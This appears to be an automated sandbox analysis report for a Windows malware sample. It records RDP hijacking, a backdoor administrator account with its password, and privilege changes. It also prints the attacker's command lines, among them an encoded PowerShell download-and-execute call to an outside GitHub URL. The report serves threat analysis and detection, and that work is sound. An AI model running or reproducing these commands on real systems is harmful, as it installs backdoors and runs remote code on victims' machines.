Analysis
-
max time kernel
48s -
max time network
125s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
16-06-2021 10:08
Static task
static1
Behavioral task
behavioral1
Sample
6efc7601be401f3e9b49f4f2cf63fee9.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
6efc7601be401f3e9b49f4f2cf63fee9.exe
Resource
win10v20210410
General
-
Target
6efc7601be401f3e9b49f4f2cf63fee9.exe
-
Size
6.0MB
-
MD5
6efc7601be401f3e9b49f4f2cf63fee9
-
SHA1
6c975b9f64a3e0840c43f11571bc4b1bccdc3d83
-
SHA256
9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724
-
SHA512
87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 13 1252 powershell.exe 15 1252 powershell.exe 16 1252 powershell.exe 17 1252 powershell.exe 19 1252 powershell.exe 21 1252 powershell.exe 23 1252 powershell.exe 25 1252 powershell.exe 27 1252 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3488 3488 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA473.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4C3.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA504.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jgcka5tz.dwz.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1d3043kd.q33.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA493.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4F3.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 1832 powershell.exe 1832 powershell.exe 1832 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 1252 powershell.exe 1252 powershell.exe 1252 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeIncreaseQuotaPrivilege 1156 powershell.exe Token: SeSecurityPrivilege 1156 powershell.exe Token: SeTakeOwnershipPrivilege 1156 powershell.exe Token: SeLoadDriverPrivilege 1156 powershell.exe Token: SeSystemProfilePrivilege 1156 powershell.exe Token: SeSystemtimePrivilege 1156 powershell.exe Token: SeProfSingleProcessPrivilege 1156 powershell.exe Token: SeIncBasePriorityPrivilege 1156 powershell.exe Token: SeCreatePagefilePrivilege 1156 powershell.exe Token: SeBackupPrivilege 1156 powershell.exe Token: SeRestorePrivilege 1156 powershell.exe Token: SeShutdownPrivilege 1156 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeSystemEnvironmentPrivilege 1156 powershell.exe Token: SeRemoteShutdownPrivilege 1156 powershell.exe Token: SeUndockPrivilege 1156 powershell.exe Token: SeManageVolumePrivilege 1156 powershell.exe Token: 33 1156 powershell.exe Token: 34 1156 powershell.exe Token: 35 1156 powershell.exe Token: 36 1156 powershell.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeIncreaseQuotaPrivilege 1832 powershell.exe Token: SeSecurityPrivilege 1832 powershell.exe Token: SeTakeOwnershipPrivilege 1832 powershell.exe Token: SeLoadDriverPrivilege 1832 powershell.exe Token: SeSystemProfilePrivilege 1832 powershell.exe Token: SeSystemtimePrivilege 1832 powershell.exe Token: SeProfSingleProcessPrivilege 1832 powershell.exe Token: SeIncBasePriorityPrivilege 1832 powershell.exe Token: SeCreatePagefilePrivilege 1832 powershell.exe Token: SeBackupPrivilege 1832 powershell.exe Token: SeRestorePrivilege 1832 powershell.exe Token: SeShutdownPrivilege 1832 powershell.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeSystemEnvironmentPrivilege 1832 powershell.exe Token: SeRemoteShutdownPrivilege 1832 powershell.exe Token: SeUndockPrivilege 1832 powershell.exe Token: SeManageVolumePrivilege 1832 powershell.exe Token: 33 1832 powershell.exe Token: 34 1832 powershell.exe Token: 35 1832 powershell.exe Token: 36 1832 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6efc7601be401f3e9b49f4f2cf63fee9.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3896 wrote to memory of 2808 3896 6efc7601be401f3e9b49f4f2cf63fee9.exe powershell.exe PID 3896 wrote to memory of 2808 3896 6efc7601be401f3e9b49f4f2cf63fee9.exe powershell.exe PID 2808 wrote to memory of 4068 2808 powershell.exe csc.exe PID 2808 wrote to memory of 4068 2808 powershell.exe csc.exe PID 4068 wrote to memory of 2284 4068 csc.exe cvtres.exe PID 4068 wrote to memory of 2284 4068 csc.exe cvtres.exe PID 2808 wrote to memory of 1156 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 1156 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 1832 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 1832 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 3024 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 3024 2808 powershell.exe powershell.exe PID 2808 wrote to memory of 3900 2808 powershell.exe reg.exe PID 2808 wrote to memory of 3900 2808 powershell.exe reg.exe PID 2808 wrote to memory of 2104 2808 powershell.exe reg.exe PID 2808 wrote to memory of 2104 2808 powershell.exe reg.exe PID 2808 wrote to memory of 1916 2808 powershell.exe reg.exe PID 2808 wrote to memory of 1916 2808 powershell.exe reg.exe PID 2808 wrote to memory of 2084 2808 powershell.exe net.exe PID 2808 wrote to memory of 2084 2808 powershell.exe net.exe PID 2084 wrote to memory of 2724 2084 net.exe net1.exe PID 2084 wrote to memory of 2724 2084 net.exe net1.exe PID 2808 wrote to memory of 2284 2808 powershell.exe cmd.exe PID 2808 wrote to memory of 2284 2808 powershell.exe cmd.exe PID 2284 wrote to memory of 3796 2284 cmd.exe cmd.exe PID 2284 wrote to memory of 3796 2284 cmd.exe cmd.exe PID 3796 wrote to memory of 2664 3796 cmd.exe net.exe PID 3796 wrote to memory of 2664 3796 cmd.exe net.exe PID 2664 wrote to memory of 2088 2664 net.exe net1.exe PID 2664 wrote to memory of 2088 2664 net.exe net1.exe PID 2808 wrote to memory of 2352 2808 powershell.exe cmd.exe PID 2808 wrote to memory of 2352 2808 powershell.exe cmd.exe PID 2352 wrote to memory of 4052 2352 cmd.exe cmd.exe PID 2352 wrote to memory of 4052 2352 cmd.exe cmd.exe PID 4052 wrote to memory of 3924 4052 cmd.exe net.exe PID 4052 wrote to memory of 3924 4052 cmd.exe net.exe PID 3924 wrote to memory of 1832 3924 net.exe net1.exe PID 3924 wrote to memory of 1832 3924 net.exe net1.exe PID 2124 wrote to memory of 2104 2124 cmd.exe net.exe PID 2124 wrote to memory of 2104 2124 cmd.exe net.exe PID 2104 wrote to memory of 4040 2104 net.exe net1.exe PID 2104 wrote to memory of 4040 2104 net.exe net1.exe PID 1804 wrote to memory of 3872 1804 cmd.exe net.exe PID 1804 wrote to memory of 3872 1804 cmd.exe net.exe PID 3872 wrote to memory of 2144 3872 net.exe net1.exe PID 3872 wrote to memory of 2144 3872 net.exe net1.exe PID 3644 wrote to memory of 3908 3644 cmd.exe net.exe PID 3644 wrote to memory of 3908 3644 cmd.exe net.exe PID 3908 wrote to memory of 2388 3908 net.exe net1.exe PID 3908 wrote to memory of 2388 3908 net.exe net1.exe PID 1516 wrote to memory of 2804 1516 cmd.exe net.exe PID 1516 wrote to memory of 2804 1516 cmd.exe net.exe PID 2804 wrote to memory of 2104 2804 net.exe net1.exe PID 2804 wrote to memory of 2104 2804 net.exe net1.exe PID 4040 wrote to memory of 1240 4040 cmd.exe net.exe PID 4040 wrote to memory of 1240 4040 cmd.exe net.exe PID 1240 wrote to memory of 3808 1240 net.exe net1.exe PID 1240 wrote to memory of 3808 1240 net.exe net1.exe PID 2144 wrote to memory of 188 2144 cmd.exe net.exe PID 2144 wrote to memory of 188 2144 cmd.exe net.exe PID 188 wrote to memory of 2664 188 net.exe net1.exe PID 188 wrote to memory of 2664 188 net.exe net1.exe PID 3004 wrote to memory of 2064 3004 cmd.exe WMIC.exe PID 3004 wrote to memory of 2064 3004 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp" "c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc IUni1mTF /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc IUni1mTF /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc IUni1mTF /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc IUni1mTF1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc IUni1mTF2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc IUni1mTF3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
